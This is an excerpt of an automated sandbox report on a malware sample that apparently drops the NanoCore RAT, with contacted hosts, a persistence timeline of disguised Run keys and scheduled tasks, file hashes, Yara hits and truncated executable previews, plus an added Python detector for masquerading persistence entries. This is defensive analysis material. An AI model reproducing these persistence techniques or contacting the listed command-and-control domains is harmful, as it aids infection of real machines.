  Source: Pluto Panel.exe, 00000005.00000003.620876949.0000000005C5A000.00000004.00000800.00020000.00000000.sdmp, Pluto Panel.exe, 00000005.00000003.645268957.0000000005C5A000.00000004.00000800.00020000.00000000.sdmp, Pluto Panel.exe, 00000005.00000003.630356431.0000000005C5A000.00000004.00000800.00020000.00000000.sdmp, Pluto Panel.exe, 00000005.00000003.585753311.0000000005C5A000.00000004.00000800.00020000.00000000.sdmp, Pluto Panel.exe, 00000005.00000003.593605825.0000000005C5A000.00000004.00000800.00020000.00000000.sdmp, Pluto Panel.exe, 00000005.00000003.539432667.0000000005C5C000.00000004.00000800.00020000.00000000.sdmp, Pluto Panel.exe, 00000005.00000003.561809650.0000000005C54000.00000004.00000800.00020000.00000000.sdmp, Pluto Panel.exe, 00000005.00000003.570284939.0000000005C5A000.00000004.00000800.00020000.00000000.sdmp, Pluto Panel.exe, 00000005.00000003.578609523.0000000005C5A000.00000004.00000800.00020000.00000000.sdmp, Pluto Panel.exe, 00000005.00000002.712090794.0000000006EE2000.00000004.00000800.00020000.00000000.sdmp
  Malicious: false | Reputation: high
http://www.fontbureau.comF
  Source: Pluto Panel.exe, 00000005.00000003.645268957.0000000005C5A000.00000004.00000800.00020000.00000000.sdmp, Pluto Panel.exe, 00000005.00000003.539432667.0000000005C5C000.00000004.00000800.00020000.00000000.sdmp, Pluto Panel.exe, 00000005.00000003.561809650.0000000005C54000.00000004.00000800.00020000.00000000.sdmp
  Malicious: false | URL Reputation: safe | Reputation: unknown
http://www.fontbureau.comsiv/C
  Source: Pluto Panel.exe, 00000005.00000003.539432667.0000000005C5C000.00000004.00000800.00020000.00000000.sdmp, Pluto Panel.exe, 00000005.00000003.561809650.0000000005C54000.00000004.00000800.00020000.00000000.sdmp, Pluto Panel.exe, 00000005.00000003.570284939.0000000005C5A000.00000004.00000800.00020000.00000000.sdmp
  Malicious: false | Avira URL Cloud: safe | Reputation: unknown
http://www.carterandcone.comTC
  Source: Pluto Panel.exe, 00000005.00000003.437487558.0000000005C80000.00000004.00000800.00020000.00000000.sdmp, Pluto Panel.exe, 00000005.00000003.437239432.0000000005C80000.00000004.00000800.00020000.00000000.sdmp, Pluto Panel.exe, 00000005.00000003.437023378.0000000005C80000.00000004.00000800.00020000.00000000.sdmp
  Malicious: false | URL Reputation: safe | Reputation: unknown
http://ocsp.thawte.com0
  Source: RIP_YOUR_PC_LOL.exe, 00000000.00000000.366341482.00000000009F2000.00000002.00000001.01000000.00000003.sdmp, RIP_YOUR_PC_LOL.exe, 00000000.00000003.437188672.00000000056F5000.00000004.00000800.00020000.00000000.sdmp, 22.exe, 0000000B.00000000.422804028.000000000042B000.00000008.00000001.01000000.0000000B.sdmp
  Malicious: false | URL Reputation: safe | Reputation: unknown
http://www.founder.com.cp
  Source: Pluto Panel.exe, 00000005.00000003.431908494.0000000005C5B000.00000004.00000800.00020000.00000000.sdmp
  Malicious: false | Avira URL Cloud: safe | Reputation: unknown
http://www.urwpp.deR
  Source: Pluto Panel.exe, 00000005.00000003.494373371.0000000005C80000.00000004.00000800.00020000.00000000.sdmp, Pluto Panel.exe, 00000005.00000003.493190429.0000000005C80000.00000004.00000800.00020000.00000000.sdmp, Pluto Panel.exe, 00000005.00000003.497114575.0000000005C80000.00000004.00000800.00020000.00000000.sdmp
  Malicious: false | Avira URL Cloud: safe | Reputation: unknown
http://www.fontbureau.comtu
  Source: Pluto Panel.exe, 00000005.00000003.570284939.0000000005C5A000.00000004.00000800.00020000.00000000.sdmp
  Malicious: false | Avira URL Cloud: safe | Reputation: unknown
https://whatismyipaddress.comx&
  Source: Pluto Panel.exe, 00000005.00000002.706003291.00000000036CE000.00000004.00000800.00020000.00000000.sdmp
  Malicious: false | Avira URL Cloud: safe | Reputation: low
http://whatismyipaddress.com
  Source: Pluto Panel.exe, 00000005.00000002.705753147.0000000003691000.00000004.00000800.00020000.00000000.sdmp
  Malicious: false | Reputation: high
http://www.jiyu-kobo.co.jp/jp/
  Source: Pluto Panel.exe, 00000005.00000003.462837238.0000000005C5B000.00000004.00000800.00020000.00000000.sdmp, Pluto Panel.exe, 00000005.00000003.459485550.0000000005C5A000.00000004.00000800.00020000.00000000.sdmp, Pluto Panel.exe, 00000005.00000003.457715522.0000000005C56000.00000004.00000800.00020000.00000000.sdmp, Pluto Panel.exe, 00000005.00000003.463380932.0000000005C5B000.00000004.00000800.00020000.00000000.sdmp, Pluto Panel.exe, 00000005.00000003.460010944.0000000005C5A000.00000004.00000800.00020000.00000000.sdmp, Pluto Panel.exe, 00000005.00000003.464082407.0000000005C5B000.00000004.00000800.00020000.00000000.sdmp, Pluto Panel.exe, 00000005.00000003.457092303.0000000005C5A000.00000004.00000800.00020000.00000000.sdmp, Pluto Panel.exe, 00000005.00000003.461983546.0000000005C5B000.00000004.00000800.00020000.00000000.sdmp, Pluto Panel.exe, 00000005.00000003.464883846.0000000005C5B000.00000004.00000800.00020000.00000000.sdmp, Pluto Panel.exe, 00000005.00000003.460984251.0000000005C5B000.00000004.00000800.00020000.00000000.sdmp
  Malicious: false | URL Reputation: safe | Reputation: unknown
http://www.fontbureau.com/designers/cabarga.htmlf
  Source: Pluto Panel.exe, 00000005.00000003.569553799.0000000005C80000.00000004.00000800.00020000.00000000.sdmp
  Malicious: false | Reputation: high
http://www.fontbureau.coma
  Source: Pluto Panel.exe, 00000005.00000002.711887980.0000000005C50000.00000004.00000800.00020000.00000000.sdmp
  Malicious: false | URL Reputation: safe | Reputation: unknown
http://www.fontbureau.comd
  Source: Pluto Panel.exe, 00000005.00000003.539432667.0000000005C5C000.00000004.00000800.00020000.00000000.sdmp
  Malicious: false | URL Reputation: safe | Reputation: unknown
http://www.fontbureau.com/designers/cabarga.htmlN
  Source: Pluto Panel.exe, 00000005.00000002.712090794.0000000006EE2000.00000004.00000800.00020000.00000000.sdmp
  Malicious: false | Reputation: high
IP | Domain | Country | ASN | ASN Name | Malicious
179.13.1.253 | gfhhjgh.duckdns.org | Colombia | 27831 | ColombiaMovil (CO) | false
172.98.92.42 | unknown | United States | 46562 | TOTAL-SERVER-SOLUTIONS (US) | false
41.249.51.34 | kazya1.hopto.org | Morocco | 36903 | MT-MPLS (MA) | false
52.20.78.240 | api.ipify.org.herokudns.com | United States | 14618 | AMAZON-AES (US) | false
80.87.192.115 | unknown | Russian Federation | 29182 | THEFIRST-AS (RU) | false
                                                                                                        Joe Sandbox Version:34.0.0 Boulder Opal
                                                                                                        Analysis ID:585264
                                                                                                        Start date:08.03.2022
                                                                                                        Start time:17:59:22
                                                                                                        Joe Sandbox Product:CloudBasic
                                                                                                        Overall analysis duration:0h 15m 34s
                                                                                                        Hypervisor based Inspection enabled:false
                                                                                                        Report type:full
                                                                                                        Sample file name:RIP_YOUR_PC_LOL.exe
                                                                                                        Cookbook file name:default.jbs
                                                                                                        Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of new started processes analysed:61
                                                                                                        Number of new started drivers analysed:0
                                                                                                        Number of existing processes analysed:0
                                                                                                        Number of existing drivers analysed:0
                                                                                                        Number of injected processes analysed:0
                                                                                                        Technologies:
                                                                                                        • HCA enabled
                                                                                                        • EGA enabled
                                                                                                        • HDC enabled
                                                                                                        • AMSI enabled
                                                                                                        Analysis Mode:default
                                                                                                        Analysis stop reason:Timeout
                                                                                                        Detection:MAL
                                                                                                        Classification:mal100.troj.adwa.spyw.evad.winEXE@84/32@48/5
                                                                                                        EGA Information:
                                                                                                        • Successful, ratio: 83.3%
                                                                                                        HDC Information:
                                                                                                        • Successful, ratio: 15.8% (good quality ratio 14.3%)
                                                                                                        • Quality average: 70.3%
                                                                                                        • Quality standard deviation: 31.5%
                                                                                                        HCA Information:
                                                                                                        • Successful, ratio: 83%
                                                                                                        • Number of executed functions: 155
                                                                                                        • Number of non-executed functions: 30
                                                                                                        Cookbook Comments:
                                                                                                        • Adjust boot time
                                                                                                        • Enable AMSI
                                                                                                        • Found application associated with file extension: .exe
                                                                                                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, conhost.exe
                                                                                                        • Excluded IPs from analysis (whitelisted): 23.211.6.115, 104.26.13.31, 172.67.75.172, 104.26.12.31, 20.190.160.129, 20.190.160.75, 20.190.160.6, 20.190.160.136, 20.190.160.73, 20.190.160.132, 20.190.160.69, 20.190.160.67, 20.42.65.92, 20.82.209.104, 80.67.82.211, 80.67.82.235
                                                                                                        • Excluded domains from analysis (whitelisted): api.ip.sb.cdn.cloudflare.net, fs.microsoft.com, www.tm.lg.prod.aadmsa.akadns.net, ctldl.windowsupdate.com, store-images.s-microsoft.com-c.edgekey.net, www.tm.a.prd.aadg.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, login.msa.msidentity.com, iris-de-ppe-azsc-neu.northeurope.cloudapp.azure.com, e12564.dspb.akamaiedge.net, onedsblobprdeus17.eastus.cloudapp.azure.com, login.live.com, blobcollector.events.data.trafficmanager.net, arc.trafficmanager.net, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net
                                                                                                        • Execution Graph export aborted for target test.exe, PID 6236 because it is empty
• Not all processes were analyzed, report is missing behavior information
                                                                                                        • Report creation exceeded maximum time and may have missing behavior and disassembly information.
                                                                                                        • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                                        • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                        • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                        • Report size getting too big, too many NtQueryValueKey calls found.
Time | Type | Description
18:01:04 | API Interceptor | 1x Sleep call for process: aaa.exe modified
18:01:13 | Autostart | Run: HKLM\Software\Microsoft\Windows\CurrentVersion\Run DHCP Monitor C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe
18:01:14 | Task Scheduler | Run new task: DHCP Monitor path: "C:\Users\user\AppData\Roaming\Opus.exe" s>$(Arg0)
18:01:22 | Task Scheduler | Run new task: DHCP Monitor Task path: "C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe" s>$(Arg0)
18:01:22 | API Interceptor | 88x Sleep call for process: Opus.exe modified
18:01:23 | Autostart | Run: HKLM\Software\Microsoft\Windows\CurrentVersion\Run a797c6ca3f5e7aff8fa1149c47fe9466 "C:\Users\user\AppData\Roaming\mediaget.exe" ..
18:01:39 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run a797c6ca3f5e7aff8fa1149c47fe9466 "C:\Users\user\AppData\Roaming\mediaget.exe" ..
18:01:54 | Autostart | Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a797c6ca3f5e7aff8fa1149c47fe9466.exe
18:02:13 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run a797c6ca3f5e7aff8fa1149c47fe9466 "C:\Users\user\AppData\Roaming\mediaget.exe" ..
18:02:48 | Task Scheduler | Run new task: dwm path: "C:\Windows\System32\srvsvc\dwm.exe"
18:02:51 | Task Scheduler | Run new task: conhost path: "C:\Windows\System32\mssip32\conhost.exe"
18:02:52 | Task Scheduler | Run new task: RuntimeBroker path: "C:\Windows\System32\WindowsDefaultHeatProcessor\RuntimeBroker.exe"
18:02:52 | Task Scheduler | Run new task: services path: "C:\Users\Public\Documents\My Music\services.exe"
18:02:52 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Windows Update C:\Users\user\AppData\Roaming\WindowsUpdate.exe
18:02:55 | Task Scheduler | Run new task: 8f1c8b40c7be588389a8d382040b23bb path: "C:\Documents and Settings\Public\Desktop\8f1c8b40c7be588389a8d382040b23bb.exe"
18:02:55 | Task Scheduler | Run new task: explorer path: "C:\Windows\winhlp32\explorer.exe"
18:02:55 | Task Scheduler | Run new task: mediaget path: "C:\Windows\CbsTemp\mediaget.exe"
18:03:04 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Windows Update C:\Users\user\AppData\Roaming\WindowsUpdate.exe
18:03:12 | Autostart | Run: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run dwm "C:\Windows\System32\srvsvc\dwm.exe"
18:03:22 | Autostart | Run: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run RuntimeBroker "C:\Windows\System32\WindowsDefaultHeatProcessor\RuntimeBroker.exe"
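The timeline above is the raw material behind the "System File Execution Location Anomaly" and "Creates autostart registry keys with suspicious names" signatures: scheduled tasks named dwm, conhost, RuntimeBroker, services and explorer whose images live in sub-folders of System32 or in user-writable paths, and Run keys whose value names are MD5-like strings or "Windows Update". The following Python is an added example, not part of the Joe Sandbox report, that parses those rows and flags the masquerading patterns. The allow-list of system directories, the list of core binary names and the rule names are assumptions made here; the last timeline row (a defrag.exe task in the real System32) is a constructed benign control, not from the report.

```python
"""Flag persistence entries whose names or paths masquerade as Windows components.

Added example. Input rows are copied from the report's behaviour timeline, plus
one constructed benign row; the allow-lists and rule names are assumptions.
"""
import re

# (time, type, description) rows copied from the report timeline. The final row is a
# constructed benign control (a genuine System32 binary) and does not come from the report.
TIMELINE = [
    ("18:01:13", "Autostart", r'Run: HKLM\Software\Microsoft\Windows\CurrentVersion\Run DHCP Monitor C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe'),
    ("18:01:14", "Task Scheduler", r'Run new task: DHCP Monitor path: "C:\Users\user\AppData\Roaming\Opus.exe" s>$(Arg0)'),
    ("18:01:22", "Task Scheduler", r'Run new task: DHCP Monitor Task path: "C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe" s>$(Arg0)'),
    ("18:01:23", "Autostart", r'Run: HKLM\Software\Microsoft\Windows\CurrentVersion\Run a797c6ca3f5e7aff8fa1149c47fe9466 "C:\Users\user\AppData\Roaming\mediaget.exe" ..'),
    ("18:01:54", "Autostart", r'Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a797c6ca3f5e7aff8fa1149c47fe9466.exe'),
    ("18:02:48", "Task Scheduler", r'Run new task: dwm path: "C:\Windows\System32\srvsvc\dwm.exe"'),
    ("18:02:51", "Task Scheduler", r'Run new task: conhost path: "C:\Windows\System32\mssip32\conhost.exe"'),
    ("18:02:52", "Task Scheduler", r'Run new task: RuntimeBroker path: "C:\Windows\System32\WindowsDefaultHeatProcessor\RuntimeBroker.exe"'),
    ("18:02:52", "Task Scheduler", r'Run new task: services path: "C:\Users\Public\Documents\My Music\services.exe"'),
    ("18:02:52", "Autostart", r'Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Windows Update C:\Users\user\AppData\Roaming\WindowsUpdate.exe'),
    ("18:02:55", "Task Scheduler", r'Run new task: explorer path: "C:\Windows\winhlp32\explorer.exe"'),
    ("18:03:12", "Autostart", r'Run: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run dwm "C:\Windows\System32\srvsvc\dwm.exe"'),
    ("18:03:30", "Task Scheduler", r'Run new task: Defrag path: "C:\Windows\System32\defrag.exe"'),  # constructed control row
]

# Core Windows binaries that only exist directly in LEGIT_DIRS on a clean system (assumed list).
SYSTEM_BINARIES = {"dwm.exe", "conhost.exe", "runtimebroker.exe", "services.exe",
                   "explorer.exe", "svchost.exe", "lsass.exe", "csrss.exe", "winlogon.exe"}
LEGIT_DIRS = {"c:\\windows", "c:\\windows\\system32", "c:\\windows\\syswow64"}
# Path prefixes a standard user can write to; persistence here needs no admin rights (assumed).
USER_WRITABLE = ("c:\\users\\", "c:\\programdata\\", "c:\\windows\\temp\\")
PATH_RE = re.compile(r"[a-zA-Z]:\\.*?\.exe", re.IGNORECASE)
TASK_RE = re.compile(r'Run new task: (.+?) path: "([^"]+)"')
HASH_NAME_RE = re.compile(r"^[0-9a-f]{32}$")


def parse(description):
    """Split a timeline description into (entry name, image path); (None, None) if no .exe path."""
    m = TASK_RE.match(description)
    if m:
        return m.group(1), m.group(2)
    if not description.startswith("Run: "):
        return None, None
    rest = description[len("Run: "):]
    path = PATH_RE.search(rest)
    if not path:
        return None, None
    # For registry entries the value name sits between the "...\Run" key and the command;
    # Startup-folder entries have neither a key nor a name.
    head = rest[:path.start()]
    name = head.split("\\Run", 1)[1] if "\\Run" in head else ""
    return name.strip().strip('"').strip(), path.group(0)


def classify(name, image_path):
    """Return the reasons (possibly none) this entry looks like masquerading persistence."""
    p = image_path.lower()
    directory, _, basename = p.rpartition("\\")
    stem = (name or "").lower()
    reasons = []
    # A core binary name in a *sub*-folder of System32 or anywhere else is the classic anomaly.
    if basename in SYSTEM_BINARIES and directory not in LEGIT_DIRS:
        reasons.append("system_binary_outside_system_dir")
    if p.startswith(USER_WRITABLE):
        reasons.append("image_in_user_writable_path")
    if "\\start menu\\programs\\startup\\" in p:
        reasons.append("startup_folder")
    if HASH_NAME_RE.match(stem):
        reasons.append("hash_like_entry_name")
    # Entry named like a Windows component but pointing outside C:\Windows.
    looks_like_component = stem.startswith("windows") or stem + ".exe" in SYSTEM_BINARIES
    if looks_like_component and not p.startswith("c:\\windows\\"):
        reasons.append("component_name_mismatch")
    return reasons


def scan(timeline):
    """Return one finding per Autostart / Task Scheduler row that triggers at least one rule."""
    findings = []
    for time, kind, description in timeline:
        if kind not in ("Autostart", "Task Scheduler"):
            continue
        name, image = parse(description)
        if image is None:
            continue
        reasons = classify(name, image)
        if reasons:
            findings.append({"time": time, "type": kind, "name": name,
                             "image": image, "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in scan(TIMELINE):
        print(f"{f['time']} {f['type']:<14} {f['name'] or '<startup folder>':<34} "
              f"{f['image']}  <- {', '.join(f['reasons'])}")
```

Two things the output makes visible. The directory test is an exact match, not a prefix match: C:\Windows\System32\srvsvc\dwm.exe is flagged precisely because a prefix check on C:\Windows\System32 would have let it through. And the NanoCore "DHCP Monitor" entries pointing into C:\Program Files (x86) trip none of these path rules, which is why location anomalies have to be paired with file reputation or Yara results like the ones listed for dhcpmon.exe further down.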
                                                                                                        Process:C:\Users\user\AppData\Roaming\Opus.exe
                                                                                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                        Category:dropped
                                                                                                        Size (bytes):208384
                                                                                                        Entropy (8bit):7.449669736966968
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:6144:cLV6Bta6dtJmakIM5zEN/wjwJsvle+o9f/N:cLV6Btpmk1Elepd
                                                                                                        MD5:759185EE3724D7563B709C888C696959
                                                                                                        SHA1:7C166CC3CBFEF08BB378BCF557B1F45396A22931
                                                                                                        SHA-256:9384798985672C356A8A41BF822443F8EB0D3747BFCA148CE814594C1A894641
                                                                                                        SHA-512:ED754357B1B995DE918AF21FECD9D1464BDEA6778F7AB450A34E3AAE22BA7EEBC02F2442AF13774ABFDF97954E419EC9E356B54506C7E3BF12E3B76EE882FA2C
                                                                                                        Malicious:true
                                                                                                        Yara Hits:
• Rule: Nanocore_RAT_Gen_2, Description: Detects the Nanocore RAT, Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe, Author: Florian Roth
                                                                                                        • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe, Author: Florian Roth
                                                                                                        • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe, Author: Joe Security
                                                                                                        • Rule: MALWARE_Win_NanoCore, Description: Detects NanoCore, Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe, Author: ditekSHen
                                                                                                        • Rule: NanoCore, Description: unknown, Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe, Author: Kevin Breen <kevin@techanarchy.net>
                                                                                                        Antivirus:
                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
• Antivirus: Metadefender, Detection: 85%
                                                                                                        • Antivirus: ReversingLabs, Detection: 100%
                                                                                                        Reputation:unknown
                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....'.T.....................d........... ........@.. ......................................................................8...W.... ..$`........................................................................... ............... ..H............text........ ...................... ..`.reloc..............................@..B.rsrc...$`... ...b..................@..@................t.......H...........T............................................................0..Q........o5.......*.o6....-.&......3+..+.... ....3......1..... 2.... ....3.... .......*.*....0..E.......s7....-(&s8....-&&s9....,$&s:........s;........*.....+.....+.....+.....0..........~....o<...*..0..........~....o=...*..0..........~....o>...*..0..........~....o?...*..0..........~....o@...*..0.............-.&(A...*&+...0..$.......~B........-.(...+.-.&+..B...+.~B...*.0.............-.&(A...*&+...0..
                                                                                                        Process:C:\Users\user\AppData\Roaming\0fd7de5367376231a788872005d7ed4f.exe
                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                        Category:dropped
                                                                                                        Size (bytes):10
                                                                                                        Entropy (8bit):2.6464393446710157
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:3:HLLv:fv
                                                                                                        MD5:7AE4BED9A9648A53C3508D11671EF714
                                                                                                        SHA1:C349F54BAAA203AB3DC98498C49851C0704DD217
                                                                                                        SHA-256:C355B022F11CFAD7126BBD035784DAB1E94C3604D1528A130465E823C6EC1149
                                                                                                        SHA-512:7E3C40C668FAA94C9C1420B70405F41181BAE21F906C48164828E5427F66950483C4056E48C1FFF56634A5CDD943E5B1E40B8BEC798F4349E46263B21D7E1C6E
                                                                                                        Malicious:false
                                                                                                        Reputation:unknown
                                                                                                        Preview:84.17.52.7
                                                                                                        Process:C:\Users\user\Desktop\RIP_YOUR_PC_LOL.exe
                                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                                        Category:dropped
                                                                                                        Size (bytes):128
                                                                                                        Entropy (8bit):5.185983766127119
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:3:QHXMKaZImrnLCR2RAVIAQyz2QyDBLnDLFv:Q3LadLCR22IAQykdL1v
                                                                                                        MD5:1F5C279D069793BFDB15F6DAC63D5C39
                                                                                                        SHA1:EFA436296EE3BC196FFC4FBD48978A4A1BB6FD34
                                                                                                        SHA-256:007D94877B5C9048FDC238CF6E63516F2BF398588878947E1DC4A4E55553602D
                                                                                                        SHA-512:48270029CAB2C46093058BDB28795ECA137656C1B4EB9E1EFD2111EA42997B29312B7A0EBFD6EB411375F799754D2403C233D0FF6B65103AEFABDE68268ED747
                                                                                                        Malicious:true
                                                                                                        Reputation:unknown
                                                                                                        Preview:1,"fusion","GAC",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_32\System\1ffc437de59fb69ba2b865ffdc98ffd1\System.ni.dll",0..
                                                                                                        Process:C:\Users\user\AppData\Roaming\aaa.exe
                                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                                        Category:dropped
                                                                                                        Size (bytes):525
                                                                                                        Entropy (8bit):5.2874233355119316
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:12:Q3LaJU20NaL10Ug+9Yz9t0U29hJ5g1B0U2ukyrFk7v:MLF20NaL3z2p29hJ5g522r0
                                                                                                        MD5:80EFBEC081D7836D240503C4C9465FEC
                                                                                                        SHA1:6AF398E08A359457083727BAF296445030A55AC3
                                                                                                        SHA-256:C73F730EB5E05D15FAD6BE10AB51FE4D8A80B5E88B89D8BC80CC1DF09ACE1523
                                                                                                        SHA-512:DEC3B1D9403894418AFD4433629CA6476C7BD359963328D17B93283B52EEC18B3725D2F02F0E9A142E705398DDDCE244D53829570E9DE1A87060A7DABFDCE5B3
                                                                                                        Malicious:false
                                                                                                        Reputation:unknown
                                                                                                        Preview:1,"fusion","GAC",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_32\System\1ffc437de59fb69ba2b865ffdc98ffd1\System.ni.dll",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_32\Microsoft.VisualBas#\cd7c74fce2a0eab72cd25cbe4bb61614\Microsoft.VisualBasic.ni.dll",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Drawing\54d944b3ca0ea1188d700fbd8089726b\System.Drawing.ni.dll",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Windows.Forms\bd8d59c984c9f5f2695f64341115cdf0\System.Windows.Forms.ni.dll",0..
                                                                                                        Process:C:\Users\user\AppData\Roaming\gay.exe
                                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                                        Category:dropped
                                                                                                        Size (bytes):525
                                                                                                        Entropy (8bit):5.2874233355119316
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:12:Q3LaJU20NaL10Ug+9Yz9t0U29hJ5g1B0U2ukyrFk7v:MLF20NaL3z2p29hJ5g522r0
                                                                                                        MD5:80EFBEC081D7836D240503C4C9465FEC
                                                                                                        SHA1:6AF398E08A359457083727BAF296445030A55AC3
                                                                                                        SHA-256:C73F730EB5E05D15FAD6BE10AB51FE4D8A80B5E88B89D8BC80CC1DF09ACE1523
                                                                                                        SHA-512:DEC3B1D9403894418AFD4433629CA6476C7BD359963328D17B93283B52EEC18B3725D2F02F0E9A142E705398DDDCE244D53829570E9DE1A87060A7DABFDCE5B3
                                                                                                        Malicious:false
                                                                                                        Reputation:unknown
                                                                                                        Preview:1,"fusion","GAC",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_32\System\1ffc437de59fb69ba2b865ffdc98ffd1\System.ni.dll",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_32\Microsoft.VisualBas#\cd7c74fce2a0eab72cd25cbe4bb61614\Microsoft.VisualBasic.ni.dll",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Drawing\54d944b3ca0ea1188d700fbd8089726b\System.Drawing.ni.dll",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Windows.Forms\bd8d59c984c9f5f2695f64341115cdf0\System.Windows.Forms.ni.dll",0..
                                                                                                        Process:C:\Users\user\AppData\Roaming\healastounding.exe
                                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                                        Category:dropped
                                                                                                        Size (bytes):128
                                                                                                        Entropy (8bit):5.185983766127119
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:3:QHXMKaZImrnLCR2RAVIAQyz2QyDBLnDLFv:Q3LadLCR22IAQykdL1v
                                                                                                        MD5:1F5C279D069793BFDB15F6DAC63D5C39
                                                                                                        SHA1:EFA436296EE3BC196FFC4FBD48978A4A1BB6FD34
                                                                                                        SHA-256:007D94877B5C9048FDC238CF6E63516F2BF398588878947E1DC4A4E55553602D
                                                                                                        SHA-512:48270029CAB2C46093058BDB28795ECA137656C1B4EB9E1EFD2111EA42997B29312B7A0EBFD6EB411375F799754D2403C233D0FF6B65103AEFABDE68268ED747
                                                                                                        Malicious:true
                                                                                                        Reputation:unknown
                                                                                                        Preview:1,"fusion","GAC",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_32\System\1ffc437de59fb69ba2b865ffdc98ffd1\System.ni.dll",0..
                                                                                                        Process:C:\Users\user\AppData\Roaming\0fd7de5367376231a788872005d7ed4f.exe
                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                        Category:dropped
                                                                                                        Size (bytes):10
                                                                                                        Entropy (8bit):2.6464393446710157
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:3:HLLv:fv
                                                                                                        MD5:7AE4BED9A9648A53C3508D11671EF714
                                                                                                        SHA1:C349F54BAAA203AB3DC98498C49851C0704DD217
                                                                                                        SHA-256:C355B022F11CFAD7126BBD035784DAB1E94C3604D1528A130465E823C6EC1149
                                                                                                        SHA-512:7E3C40C668FAA94C9C1420B70405F41181BAE21F906C48164828E5427F66950483C4056E48C1FFF56634A5CDD943E5B1E40B8BEC798F4349E46263B21D7E1C6E
                                                                                                        Malicious:false
                                                                                                        Reputation:unknown
                                                                                                        Preview:84.17.52.7
                                                                                                        Process:C:\Users\user\AppData\Roaming\8f1c8b40c7be588389a8d382040b23bb.exe
                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                        Category:dropped
                                                                                                        Size (bytes):335872
                                                                                                        Entropy (8bit):7.696824069546379
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:6144:WLR0mFZcyJuOwhXdZkWwQ5eRI44axa7AP5Mb:8RHTJuOwhNZkWwQURI4xxa70ab
                                                                                                        MD5:870D6E5AEF6DEA98CED388CCE87BFBD4
                                                                                                        SHA1:2D7EEE096D38D3C2A8F12FCBA0A44B4C4DA33D54
                                                                                                        SHA-256:6D50833895B2E3EB9D6F879A6436660127C270B6A516CDA0253E56A3D8B7FBA0
                                                                                                        SHA-512:0D55AB28B2F80136AF121B870B7503551D87BBEB2848CF9A32540006CAC9A5E346D9FCCE2BF1223A22927F72A147B81487533A10B91373D4FA4429D6159FD566
                                                                                                        Malicious:true
                                                                                                        Antivirus:
                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                        • Antivirus: Metadefender, Detection: 29%
                                                                                                        • Antivirus: ReversingLabs, Detection: 86%
                                                                                                        Reputation:unknown
                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....>.a..................... .......Y............@..........................0.......F......................................T...P.... ..t...............................................................................d............................text............................... ..`.data...............................@....rsrc...t.... ......................@..@........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                        Process:C:\Users\user\AppData\Roaming\8f1c8b40c7be588389a8d382040b23bb.exe
                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                        Category:dropped
                                                                                                        Size (bytes):290816
                                                                                                        Entropy (8bit):7.605066056188275
